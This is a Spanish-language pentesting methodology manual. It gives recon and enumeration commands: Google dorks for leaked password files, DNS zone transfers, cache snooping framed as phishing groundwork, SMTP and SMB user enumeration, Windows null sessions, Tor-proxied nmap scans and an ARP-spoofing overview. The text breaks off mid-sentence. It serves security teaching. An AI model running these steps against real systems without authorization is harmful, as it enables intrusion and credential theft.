Sie sind auf Seite 1von 99

Mira los videos en YouTube (Anonimo501) POR ANONIMO501

ANATOMÍA Y METODOLOGÍA
DE UN PENTESTING
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Partes de la Anatomía:

En este manual enseñare el correcto procedimiento de un Pentesting.

1) Recolección de información/Footpriting/Doxing

*Puntos de Información Critica que se intentara identificar.

- ¿Qué buscamos en la información pública disponible?

*Hacking con buscadores

Libro PDF

*Osint

-Maltego

-Theharvester

-Metagoofil

-Foca

*Whois

-whois Linux

-whois Windows

*DNS

-Dnsrecon

-Fierce

-Recon-ng

-Urlcrazy

*Reverse IP

-Nslookup

*Whois HostingThis

-Averigua que hosting usa cualquier sitio web (Descubra quién es el proveedor de alojamiento de
cualquier sitio web)

https://es.hostadvice.com/tools/whois/

https://www.whoishostingthis.com/es/

*Extracción de información y Análisis de Metadatos

-Metagoofil
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
-Foca

2) Enumeración/Escaneo

* Levantamiento de información

-Direcciones

-Rangos IP

-Vlans

-Equipos Activos

-Detección de DNS

-Detección de Sistemas Operativos

-Servicios y sus Versiones

-Aplicaciones Corriendo en los Servicios (Versiones)

-Detección de IDS

-IPS

-Firewalls

-WAFS

-Balanceadores de Carga

-Proxys

-Nombres de Usuarios por Servicio

-Recursos Compartidos

3) Análisis

Modelado de Infraestructura

Servicios

Aplicaciones

Sistemas Operativos

Identificación de Fallos Conocidos (infraestructura, Servicios, Apps y S.O)

(Este último paso Identificación de Fallos si la empresa tiene su

Metodología propia saltamos a la parte de DOCUMENTACION de lo

Contrario seguimos la metodología a seguir - (Explotación)).

4) Explotación

Fuerza Bruta

Captura de Información de Red

Cracking Passwords

Ingeniería social (Si está definido o acordado de lo contrario no hacerlo)


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Lanzar Exploits a Servicios Encontrados

Ingeniería Inversa

Lanzar Procesos de Fuzzing Para Identificar Fallos

Lanzar Ataques de DOS

Actualización Maliciosa

Generación de Exploits

Escalar Privilegios

Pivoting

Dump de Información

Obtención de Evidencias para la Generación del Informe

5) Documentación

Documento de Confidencialidad

Generación de Informe técnico

Generación de Informe Ejecutivo


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

1) RECOLECCIÓN DE INFORMACIÓN

*PUNTOS DE INFORMACIÓN CRITICA QUE SE INTENTARA IDENTIFICAR


¿Qué es la Recopilación de Información?

(Resumen).

La Recopilación de información nos permite tener o crear un perfil casi completo de la seguridad de una empresa u
organización.

A continuación, veremos los puntos que debemos intentar identificar que son puntos críticos para una empresa.

-INTERNET:

Nombre de Dominio.

Bloque de Red y Subred.

Direcciones IP específicas de Sistemas a los que se Puede Acceder por Medio de Internet.

Servicios TCP y UDP Ejecutándose en Cada Sistema Identificado.

Arquitectura de Sistema. Ejemplo: (Windows x86).

Mecanismos de Control de Acceso y Listas de Control de Acceso.

Sistemas de Detección de Intrusos IDS.

Enumeración de Sistemas (Nombres de Usuario y Grupo, Anuncios del Sistema, Tablas de Enrutamiento e
Información SNMP).

Nombres de Host DNS.

-INTRANET:

Protocolos de Red en Uso (IP, IPX, ETC).

Nombres de Dominio Internos.

Bloques de Red.

Dirección IP Especificas de Sistemas a las que Puede Accederse por Medio de Intranet.

Servicios TCP y UDP que se Ejecutan en Cada Sistema Identificado.

Arquitectura de Sistema. Ejemplo (Windows x86).

Sistemas de Detección de Intrusos.

Sistemas de Enumeración (Nombres de Usuario y Grupo, Anuncios Del Sistema, Tablas de Enrutamiento e
Información SNMP).

-Acceso Remoto:

Números de Teléfonos Análogos y Digitales.

Tipo de Sistema Remoto.

Mecanismos de Autenticación.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
VPN y Protocolos Relacionados (IPSec y PPTP).

-Extranet:

Nombres de Dominio.

Origen y Destino de la Conexión.

Tipo de Conexión.

Mecanismo de Control de Acceso.

- ¿Qué buscamos en la información pública disponible?

Páginas Web de la compañía.

Crear una copia completa de la página web para ser analizada de forma offline.

Esto lo podremos hacer con el programa HTTRACK (En el canal de YouTube hay un video de cómo hacer la copia
con la herramienta link: https://www.youtube.com/watch?v=KwNHcB6Mgq0&t=1s)

Organizaciones Relacionadas.

Nombre de la Compañía, Ciudad donde está Situada la Compañía, Nombre del Autor, Nombre del Cliente a
Quien le estamos Haciendo la Auditoria.

Detalles de Ubicación.

Conseguir las Coordenadas de la Ubicación, Tomar Imágenes/pantallazos para que Pueda Familiarizarse con el
Edificio, Lo que Rodea, Las Calles y el Transito en el Área.

Empleados: Números Telefónicos, Nombres de Contacto, Direcciones de Correo electrónico y Detalles


Personales.

Política de Privacidad o Seguridad.

Cualquier tipo de Archivo, programa, cualquier información que proporcione conocimientos sobre la privacidad.

Información Archivada.

Buscar en Internet este tipo de información puede ser eliminada deliberadamente por razones de seguridad.

Empleados Inconformes.

Otra Amenaza Real Puede Provenir de Empleados Inconformes que Publiquen Información al Respecto.

Otra información de Interés.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*HACKING CON BUSCADORES (Google hacking)

(Link de descarga libro Hacking con Buscadores)

Comentario: Dejo link de Descarga (Pendiente).

ttps://docs.google.com/uc?export=download&id=1_JXSQBYmQkvxodt1yC61-Quv9AZdjaOi

Estos comandos sirven para encontrar información pública y en ocasiones fuga de datos sobre el dominio y/o empresa
auditada.

COMANDOS:

Site:dominio.com index of

Site:dominio.com filetype:doc (xls, ppt, pdf)

Site:dominio.com intranet

Site:dominio.com administrador/admin

Site:dominio.com error/warning

Site:dominio.com login/logon

Site:dominio.com passwords/contraseñas filetype:doc (xls, pdf)

Site:dominio.com confidencial/private/privado/restringido
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*MALTEGO
Con Maltego podremos encontrar mucha información tales como correos, teléfonos, servidores y mucho más, muy
importante hacer un escaneo con Maltego.

* THEHARVESTER
con TheHarvester buscaremos correos relacionados. (con –f nombre.html guardamos el escaneo en HTML).
Comando: theharvester -d unoraya.com -b all -l 100 -f archivo.html (este comando hace FULL HARVESTER)
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*METAGOOFIL

Esta herramienta busca diferentes tipos de archivos de las diferentes extensiones pdf, doc., docx, Excel, ppt, ppx, etc.

Comando: metagoofil -d unoraya.com -t docx,pdf -l 2000 -n 50 -o umkali -f umkali.html

Se está limitando la búsqueda a 2000 en este caso y se está creando una carpeta con el nombre umkali.

(SHODAN)

Podremos buscar información adicional con Shodan.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
(HTTPrint)
Identificación del servidor WEB:

Primero ir a opciones y desmarcar la opción ICMP dar en ok.

Escribimos el dominio a escanear y le damos en la flecha verde para que inicie el escaneo, aquí podemos ver que la
herramienta a determinado con un 44.58% de que el servidor web es un Apache Microsoft-IIS/6.0.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*Web Data Extractor
Esta herramienta nos permite encontrar información tal como las URL que tiene asociada esa página WEB, también nos puede
mostrar direcciones de correo electrónicos y números de teléfonos que hay en la base de datos de la página.

(HTTPrecon):
Recolección de huellas digitales del servidor web.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*FOCA
En foca podremos ver dominios, IPs, Documentos, podremos hacer escaneo de metadatos, entre otras cosas.

EXIFTOOL
Nos permite escanear documentos y extraer información detallada que puede ser de gran interés.
Descargan exiftool para windows lo guardan y entran a su ubicación para abrir el símbolo de sistema
Y lo ejecutan con el siguiente comando:
“exiftool(-k).exe” ”websploit ataques MITM.PNG”
Donde exiftool(-k).exe es el nombre de la herramienta y websploit ataques MITM.PNG es el nombre del archivo el
cual queremos extraer la información.
Link de descarga: https://www.sno.phy.queensu.ca/~phil/exiftool/
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
NSLOOKUP
Nslookup resuelve la IP ingresando el nombre de dominio o al revés.

*WHOIS
Mediante la búsqueda de whois podremos encontrar (el nombre del propietario del dominio, dirección IP, el contacto
administrativo, el contacto técnico, números telefónicos etc.).

Hay muchos sitios en internet que nos permitirán hacer whois a la página que deseamos pero también podemos hacer este tipo
de escaneo desde Linux la verdad hay muchas opciones para esto, en este caso solo les mostrare 2 primero un escaneo por la
IANA: https://www.iana.org/whois y otro desde Linux.

Página de la IANA: https://www.iana.org/whois


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

En Linux:
Comando: whois ejemplo.com

Información sobre el registrador del dominio:

Información sobre el contacto administrativo del dominio:

Información sobre el contacto técnico:


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Información sobre servidores DNS asociados al dominio:

*DNSRECON:
Transferencia De Zona
Tabla de los diferentes servidores que podemos encontrar en un escaneo de Transferencia de Zona.

A Addres - (Dirección) Este registro se usa para traducir nombres de


hosts a direcciones IPv4
AAAA Addres - (Dirección) Este registro se usa en IPv6 para traducir
nombres de hosts a direcciones IPv6
CNAME Canonical Name - Se usa para crear nombres de hosts adicionales,
o alias, para los hosts de un domino. Es usado cuando se están
corriendo múltiples servicios como (ftp y servidores web) en un
servidor con una sola dirección IP. Cada servicio tiene su propia
entrada de DNS como (ftp.ejemplo.com y www.ejemplo.com). Esto
también es usado cuando se ejecutan múltiples servidores http,
con diferentes nombres, sobres el mismo host.
NS Name Server - (servidor de nombres) Define la asociación que
existe entre un nombre de dominio y los servidores de nombres
que almacenan la información de dicho dominio cada dominio se
puede asociar a una cantidad cualquiera de servidores de nombre.
MX (registro) Mail Exchange - (Registro de Intercambio de Correo) Asocia un
nombre de dominio a una lista de servidores de intercambio de
correo para ese dominio.
PTR Pointer - (indicador) También conocido como ‘registro inverso’,
funciona a la inversa del registro A, traduciendo IPs en nombres de
dominio.
SOA Start Of Authority - (Autoridad de la zona) Proporciona información
sobre el servidor DNS primario de la zona.
HINFO Host information – (información del equipo) Descripción del host,
permite que la gente conozca el tipo de máquina y sistema
operativo al que corresponde un dominio.
TXT Text – (información textual) Permite a los dominios identificarse de
modos arbitrarios.
LOC Localización – Permite indicar las coordenadas del dominio.
WKS Generalización del registro MX para indicar los servicios que ofrece
el dominio. Obsoleto en favor de SRV.
SRV Servicios – permite indicar los servicios que ofrece el dominio RFC
2782.
SPF Sender policy framework – Ayuda a combatir el Spam. en este
registro se especifica los hosts que están autorizados a enviar
correo desde el dominio dado.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Comando: dnsrecon -t std -d ejemplo.com

Donde –t significa el tipo de escaneo/reconocimiento que se va hacer std es de estándar -d de Dominio.

(Escaneo Genérico de Dominio).

Comando 2: dnsrecon -t axfr -d ejemplo.com

Realiza transferencia de zona


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Para Guardar el Escaneo en un archivo TXT.

Comando: dnsrecon -t axfr -d ejemplo.com >> nombrearchivo.txt

*FIERCE
Realiza Transferencia de Zona Con más detalle que el Anterior.

Comando: fierce -dns ejemplo.com


Nota: Al realizar un ataque de Transferencia de Datos También Podríamos Hacer un ataque de Fuerza Bruta (Diccionario)
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

OTRA forma de hacer transferencia de zona con DIG.

(DNS Discovery): Obtener la IP del servidor, flags, pregunta (QUESTION SECTION) y respuesta (ANSWER SECTION).

COMANDO: dig www.url.com

Con una sola consulta (ANY) podremos obtener todos los nombres de los DNS asociados del dominio (conexionio.com) el cual
estamos preguntando, con esta consulta podemos obtener los servidores DNS del dominio, servidores de correo.

COMANDO: dig conexionio.com ANY


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*DNS CACHE SNOOPING


Con el siguiente comando aremos una consulta a los servidores DNS de Google (8.8.8.8), para conocer si el dominio
conexionio.com esta cacheado (dentro del cache de los servidores de Google), con esta consulta podremos saber si los
usuarios de la empresa que estamos auditando podrían estar visitando alguna página bancaria para posteriormente enviar un
ataque de Phishing o Spear Phishing. (este procedimiento se puede hacer sobre cualquier cache DNS)

(+norecurse le estamos diciendo que no traiga la información recurse).

COMANDO: dig @8.8.8.8 www.conexionio.com A +norecurse


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Para saber que servidores DNS que están cacheados le vamos a pasar un archivo de texto con los servidores ANSWER SECTION
y AUTHORITY SECTION ya obtenidos a FOCA.

Escribimos el dominio y hacemos click en obtain DNS servers.

Luego cargamos el archivo que creamos con la lista de ANSWER SECTION y AUTHORITY SECTION que obtuvimos antes.

Y ya nos mostrara los DNS cacheados. (aquí nos damos cuenta que los usuarios de la empresa han visitado fastwebhost.com).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
(DNS Bruting: Metasploit): También con Metasploit mediante fuerza bruta de nombres DNS podemos obtener los nombres de
subdominios del dominio que estamos auditando, el diccionario que se usa ya está incluido dentro de Metasploit solo hay que
activarlo y fijarlo con el comando (set ENUM_BRT true).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
(Banner Grabbing): Con Banner Grabbing podremos saber el Tipo de versión de Software utilizado y los tipos de Servicios.

Donde 69.160.38.2 es la IP del dominio auditado y 20-80 los puertos escaneados

COMANDO: echo "" | nc -v -n -w1 69.160.38.2 20-80

(NETCRAFT)
Sistema operativo utilizado por el servidor y dirección de la empresa:
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*RECON-NG

Su funcionamiento es muy similar a Metasploit. (Herramienta muy completa).

Sirve para hacer reconocimiento para hacer recolección de información podemos hacer etapas de secuencia para la recolección
de información esto lo almacena en una base de datos. (hecha en Python)

Formas de uso:

use: para seleccionar un módulo a usar

search: buscar en los módulos disponibles

set: asignar un valor a un parámetro

show: mostrar la diferente información de los resultados

run: ejecutar la acción seleccionada

Comandos: recon-ng (veremos las opciones que nos da)

Con help vemos las opciones. (Serie de comandos con lo que se podrá trabajar).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Comando: search domain

Nos muestra las opciones que tenemos

Seleccionamos una en este caso seleccionare el comando: use recon/domains-hosts/google_site_web

Con show veremos las opciones y con show dashboard veremos los módulos que se han corrido

Si tipeamos show info nos mostrara la información del módulo que hemos seleccionado.

(show info es como escribir en Metasploit show options).

Luego de setear la página a escanear le decimos run para que comience a buscar dentro de Google.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Ahora veremos las entradas con el comando show dashboard.

Tipeamos show hosts para ver la tabla.

Tipeamos show domains para ver si dentro de lo que escaneamos encontramos un dominio.

En este caso no encontramos XD.

Ahora vamos a resolver IPs

Escribimos el comando: search resolve

Tipeamos: use recon/hosts-hosts/resolve


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Escribimos: run

Para que resuelva todas las IP de los hosts escaneados anteriormente como yo solo encontré uno el resolverá solo esa IP.

Y vemos las IP resueltas con el comando: show hosts

ahora usaremos el comando: search ip

para buscar el resto de los campos faltantes en la tabla de los hosts ya encontrados usamos el

comando: use recon/hosts-hosts/ipinfodb (para poder usarla se necesita la API key).

Se setea y lo ponemos a correr con run.

Con el comando: keys list

Podremos ver cuales necesitan la API KEY para funcionar.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Algunas APIS KEY son Gratuitas y otras son de paga.

Para añadir una API KEY solo necesitamos tipear lo siguiente:

La llave se escribiría después de ipinfodb_api y quedaría agregada automáticamente.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Ahora miremos si tiene dominios que usan SSL con el

Comando: use recon/domains-hosts/ssl_san


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Para poder pasar todos estos hosts escaneados a la tabla domains vamos a tipear lo

siguiente: search migrate

siguiente: use recon/hosts-domains/migrate_hosts

Y podremos ver en la tabla de arriba que se han agregado los dominios encontrados.

Después de obtener más dominios buscaremos las ip de los dominios nuevos

Escribimos el comando: search resolve

Tipeamos: use recon/hosts-hosts/resolve

Escribimos: run

Y veremos de nuevo con el comando: show hosts Las IPs nuevas que se han resuelto.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
(SMTP_ENUM)

El módulo de enumeración SMTP se conectará al servidor de correo dado y usará una lista de palabras para enumerar los
usuarios que están presentes en el sistema remoto.

Usar el módulo es una simple cuestión de escanear y una lista de palabras que contiene nombres de usuario para enumerar.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Primero escaneará un rango y encontrará servidores de correo, después encontrará usuarios, como en la siguiente imagen
(podríamos utilizarlos para generar un ataque de Diccionario).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
* URLCRAZY

Esta herramienta encuentra si han creado paginas phishing o dominios parecidos a la página o sitio original.

En este proceso no nos va a mostrar el dominio original solo nos mostrara dominios generados parecidos el cual pueden estar
siendo usados para hacer phishing.

También podremos saber si el dominio que estamos auditando posee más dominios. (para poder investigarlos y ver si son
vulnerables).

Ayuda a conocer nombres parecidos a la página original para obtener o conseguir el dominio y poder usarlo como phishing o
ingeniería social, también muestra que sitios han o no han sido usados para esto.

Comando: urlcrazy -k qwerty -o unorayaURLs.txt unoraya.com

Encontraremos que por Omisión (Se omiten palabras) Son páginas que han creado omitiendo letras para crear paginas phishing

Ahora veremos que se han creado también con caracteres repetidos.

Aquí vemos un Swaping o Swap el cual consiste en alterar los caracteres (cambia el orden de las letras).

Aquí tenemos remplazo de caracteres (se remplazan letras)


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

2) ENUMERACIÓN

*NETDISCOVER

(Aquí nos podemos dar cuenta de los equipos/dispositivos activos en red)

Comando: netdiscover

Comando: netdiscover -i eth0 -r 192.168.1.0/24

-i es para elegir la interfaz de red y -r para el rango de IP

*NBTSCAN
(Para resolver los nombres de las maquinas o NetBIOS)

Comando: nbtscan 192.168.1.0/24

Comando: nbtscan -r 192.168.1.0/24 (Scanner para netbios usando rango de ips)

Comando: nbtscan -v -h 192.168.1.0/24 (Scanner para netbios con output amigable)


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*SMTP–USER–ENUM

¿Qué es el servidor SMTP?


El servidor SMTP es un ordenador encargado de llevar a cabo el servicio SMTP, haciendo las veces de “cartero
electrónico” y permitiendo el transporte de ese correo electrónico por Internet. La retransmisión SMTP funciona de un
modo muy sencillo: si el servidor SMTP confirma las identidades del remitente y del destinatario, entonces el envío se
realiza.

Digamos que es como la oficina de correos de la web: recoge el email del remitente y lo entrega en la oficina de correos
local del destinatario, que es otro servidor SMTP.

- Con smtp-user-enum vamos a empezar a enumerar usuarios.


- Lo recomendado es no hacerlo manual y usar una lista de usuarios txt

existe una lista de usuarios en la ruta

cd /usr/share/wordlists/

son diccionarios que trae por default en el Sistema Operativo.

No solo podríamos buscar en los dominios, si lo hacemos en entornos locales cambiar el www.ejemplo.com por la ip del
dispositivo el cual vamos a buscar el usuario ejemplo del comando seria.

Comando: smtp-user-enum -M VRFY -u postgres -D 192.168.1.59 -t 1000

Comando: smtp-user-enum -M VRFY -u root -D 192.168.1.59 -t 1000


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Para ver las ayudas tipear el siguiente

Comando: smtp-user-enum -h

Comando: smtp-user-enum -M VRFY -u postgres -D www.ejemplo.com -t 1000

Comando: smtp-user-enum -M VRFY -U users.txt -D www.ejemplo.com -t 1000 (podemos usar un archivo txt con usuarios)

Podríamos también buscar otro usuario cambiando postgres por el usuario root también con el

Comando: smtp-user-enum -M VRFY -u root -D www.ejemplo.com -t 1000

*SNMPCHECK
SNMP (es un protocolo que les permite a los administradores de red administrar dispositivos de red y diagnosticar sus
problemas. El protocolo SNMP tiene dos formas de trabajar: polling y traps. El polling se apoya en enviar consultas remotas ya
sea de forma activa o bajo demanda, ejecutando una operación síncrona de consulta. Los traps, sin embargo, son más bien
mensajes que lanzan los dispositivos SNMP a una dirección ya constituida, basándose en cambios o eventos, esta vez de forma
asíncrona.)

Con este comando lo que haremos es verificar si el servicio está en funcionamiento.

Este tipo de servicios se encuentra en Reuters, APS, Shwitchs, etc.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Comando: snmpcheck -w -t 192.168.1.1 (Verificación del servicio en la ip 192.168.1.1)

*SNMP-CHECK

Snmpwalk saca toda la información en bruto (hacer una prueba para ver que info trae)
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*ENUM4LINUX
Enum4linux nos extrae más información del sistema o equipo que vamos a escanear (usuario políticas de contraseñas etc).

*NMAP

si cambian un servicio de un puerto estándar por ejemplo FTP lo cambian de puerto en GENERAL NMAP lo reconoce por que
NMAP DETECTA la FIRMA de los SERVICIOS o detecta la HUELLA con la cual se identifica el servicio por lo tanto NMAP no
reconoce por el NUMERO DE PUERTO si no por sus FIRMAS/HUELLAS.

NMAP no solo sirve para escanear una RED LOCAL también puede escanear una red FUERA de LAN y escanear Ips externas.

-sS es uno de los escaneos más SIGILOSOS de NMAP.

-sV le digo que me traiga los servicios que encuentre.

-O le estoy diciendo que me muestre el Sistema Operativo.

Comando: nmap -sS -sV -O -A 192.168.1.0/24 (Detecta los servicios en el rango de IPs).

Comando: nmap -sP 192.168.1.0/24 (Descubrimiento de equipos en la RED).


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

El siguiente comando muestra los usuarios del sistema que estamos escaneando por el protocolo SMB puerto 445.

Comando: nmap --script smb-enum-users.nse -p445 192.168.1.60

Scan Smtp

Este escaneo corre en el puerto 25

Comando: nmap --script smtp-enum-users 192.168.1.60


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

En este caso SMTP no encontró nada.

*ESCANEO DE PUERTOS CON NMAP


Para anonimizar el escaneo de Nmap podemos configurar Nmap con Tor yendo a /etc/sudo nano proxychains.conf y modificar
el valor (socks4 172.0.0.1 9050 - a – socks5 127.0.0.1 9050)
Nmap (opciones) (IP) – no olvidar que tor debe estar activo para activar en Linux es: service tor start

COMANDO CON TOR: proxychains nmap -sT -PN -p21,25,80,3389,22,445 69.160.38.2


COMANDO SIN TOR: Nmap –sS 69.160.38.2

Veremos los puertos que están activos y servicios en dicha IP.

Comando: route (Aquí buscamos IP del Rúter, mascara subred y segmento)

Comando: cat /etc/resolv.conf (Buscamos los DNS)


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Comando: netdiscover (Aquí nos podemos dar cuenta de los equipos activos en red)

(Nbstat.nse) UDP

Comando: sudo nmap -sU --script nbstat.nse -p 137,138,139 192.168.1.0/24

Nmap cuenta con numerosos scripts NSE orientados a SMB que pueden ahorrar mucho tiempo a la hora de buscar recursos
compartidos mediante UDP, conseguir nombres de usuario o buscar vulnerabilidades.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Versión grafica para Windows NetBIOS Enumerator.

*NETATTACK2
Chequeo de máquinas seleccionadas o inventariadas.

Muestra el número de host conectados con sus respectivas IP y puertos abiertos

(Esta herramienta es Automatizada y muy intuitiva).


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*CHEQUEO DE MÁQUINAS SELECCIONADAS O INVENTARIADAS CON NMAP TCP/UDP.
Comando: nmap -sS -p 1-1000 192.168.1.0/24 (Escaneo de Puertos TCP)
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Comando: nmap -sU -p 1-1000 192.168.1.0/24 (Escaneo de Puertos UDP)


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Identificación de carpetas compartidas (Advanced IP Scanner)
En Windows: (Aquí encontramos carpetas compartidas, servidores FTP y demás según su configuración)

Ejemplo 2 (Escaneo con una configuración diferente)


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*IDENTIFICACIÓN DE CARPETAS COMPARTIDAS (CRACKMAPEXEC)


Con CrackMapExec podremos ver carpetas compartidas, IPs, NetBIOS (Nombre del PC), el dominio y versión del SMB de cada
equipo.

Comandos de instalación:

#~ apt-get install crackmapexec

#~ apt-get install -y libssl-dev libffi-dev python-dev build-essential

#~ pip install --user pipenv

#~ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec

#~ cd CrackMapExec

#~ sudo apt-get install pipenv

#~ pipenv shell

#~ python setup.py install

COMANDOS:

cme smb target(target=archivo de IPs) -u nombredeusuario(s) -p contraseña(s) -d WORKGROUP

cme smb 192.168.1.0/24

Escaneo de Red con Net.


Los Sistemas de Microsoft Windows disponen de un sistema de comunicaciones de red basado en el protocolo NetBIOS, se creó
con el fin de compartir recursos entre ordenadores en una Red LAN el cual vela por el correcto envió de información a través de la
comunicación.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
(usaremos los siguientes comandos para el correcto análisis de la red y obtener la mayor información posible a la hora de un
Pentesting e intentar vulnerar los sistemas mediante una sesión nula para la documentación del INFORME).

Comandos.
Net view:

Muestra información de los equipos enumerados que se encuentran visibles en la red local.

net use \\PCESCRITORIO-PC ""/user: "":

Escogemos el pc al que deseamos ingresar en este caso PCESCRITORIO-PC, este comando es para establecer la sesión nula y
Tipeamos de nuevo net use para verificar que hay una conexión establecida como en la siguiente imagen:

¡Excelente!! Una vez dentro podremos ver sus recursos compartidos (En este caso no se logró entrar).

Tipeamos el comando.

Comando opción 1: net view \\192.168.1.74

Comando opción 2: net view \\PCESCRITORIO-PC

Podrá usar nombre NetBIOS, IP privadas o IP públicas (siempre que el servidor tenga abierto en el Ruter el puerto 139 [NetBIOS]).

CABE RESALTAR QUE UNA VES AQUÍ LOS SIGUIENTES COMANDOS FUNCIONARAN EN UN CONTROLADOR DE DOMINIO.

Comando: net view /domain

Para listar los dominios y grupos de trabajo que son accesibles.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Comando: net view /domain:CORREO

Si desea obtener una lista de los diferentes ordenadores que están en funcionamiento y pertenecen a un determinado dominio o
grupo de trabajo en este ejemplo el dominio (CORREO).

Y demás comandos:

Net view /domain:CORREO \\SERVCORREO1

Net accounts

Net group

Net localgroup

Net start

3) ANÁLISIS
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*OPENVAS
Para iniciar OPENVAS por primera vez ejecutamos:

openvas initial setup

Si ya instalamos openvas ejecutando openvas initial setup y no inicia o crea problemas tiene problemas ejecutaremos

openvas check setup

Analizara toda la instalación y nos mostrara como podremos solucionar el error.

openvas feed setup

lo que hace es verificar si la base de datos de firmas está actualizada.

usarlo si se ha dejado de usar OPENVAS más de una semana.

Y por último para iniciarlo iniciamos

openvas start

Vamos a usar OpenVAS para analizar vulnerabilidades de los computadores más importantes de la red como podría ser por
ejemplo 2 servidores ya que esta herramienta es lenta en su escaneo ya que profundiza escaneando las distintas
vulnerabilidades de los mismos.

openvas-setup (para iniciar)

https://127.0.0.1:9392 (para abrir openvas en entorno web)

damos en Advanced luego en Add Exception


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Y por último le damos en Confirmar para poder ingresar a la consola Web de OpenVas

Primero vamos a configuration y seleccionamos target (configuramos el objetivo a escanear con su ip respectiva)

Seleccionamos Scans y en el submenú Tasks (si no aparecen los gráficos no olvidar ir al menú del navegador y deshabilitar en
add-ons NoSCRIPT al deshabilitar NoSCRIPT cargaran los gráficos y no tendremos problemas para crear los escaneos).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Posamos el cursor sobre la estrella y hacemos click sobre New Task

Creamos la configuración de la tarea para posteriormente iniciar el escaneo.

Después vamos a la parte inferior derecha y damos en Start para que inicie el escaneo que como ya dije antes.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Luego vamos a Scans y Reports para ir viendo el avance del escaneo.

Aquí muestro un ejemplo después de haber cargado la página nuevamente.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Una vez terminado el escaneo o antes si lo desean vamos a Scans y hacemos click en Reports, en la parte izquierda superior
podemos elegir en qué tipo de documento deseamos exportar el reporte ya sea xml, HTML, ftp, txt etc que nos servirá para
agregar al reporte.

Para ver los usuarios de OPENVAS tipeamos

openvasmd --list-users

En caso de olvidar la contraseña del login de OPENVAS tipear este comando

openvasmd --user=admin --new-password=admin

*WIRESHARK
Wireshark es un sniffer de red analizador de trafico

Cuando hacemos un análisis de tráfico a una RED Ethernet (LAN), Cuando vamos analizar una Red LAN o Ethernet
necesitaremos configurar un ARP SPOOFING para ponernos en la mitad (Ataque Man In The Middle) y que todo el tráfico pase a
través de nosotros y poderlo leer.

Para escanear una RED Ethernet (LAN) sin hacer el procedimiento anterior solo podremos ver el tráfico que viene hacia nosotros
que sale de nosotros y que va para broadcast el tráfico de los demás equipos no vamos a poder identificarlo.

Comando para ver el tráfico de una sola IP:

Comando: ip.src == 192.168.1.56

Comando para ver el tráfico de una sola IP y su Destino: ip.src == 192.168.1.56 and ip.dst == 8.8.8.8
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

También para ver el trafico WEB:

Comando: http

También podríamos capturar llamadas VOIP y reproducirlas posteriormente.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

En la siguiente imagen se muestra donde se capturaría.

Para capturar el Trafico de la RED Ethernet (LAN) podremos hacerlo con ethercap de la siguiente manera:
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Hay que tener en cuenta que si ATACAMOS el ROUTER estaríamos capturando todo el tráfico de la red (todos los dispositivos)
afectaríamos la tabla ARP y TUMBARÍAMOS LA RED.

Wireshark captura lo que es las peticiones http y conversaciones de chat siempre y cuando no viajen cifradas y mucho más.

(Todo en HTTP se puede leer y Todo lo que NO va CIFRADO ósea en TEXTO plano).

con WIRESHARK veremos lo que es:

Tamaño de paquete

Destino - quien lo envía - Cuanto pesa - Donde se mandó si hubo respuesta o no – Strings – Contraseña – Usuarios - Mails

Y podremos ver mucho más.

No sobra comentar que esta herramienta es de código abierto por lo cual puede ser modificada a nivel personal (personalizada).

*BIFURCACIÓN (IMPORTANTE)

En este punto hacer la bifurcación, si la infraestructura, servicios, apps y sistemas operativos, tienen metodología propia >
aplicar metodología de BIFURCACION y pasar a la parte de DOCUMENTACION > si esto no se cumple y no hay metodología
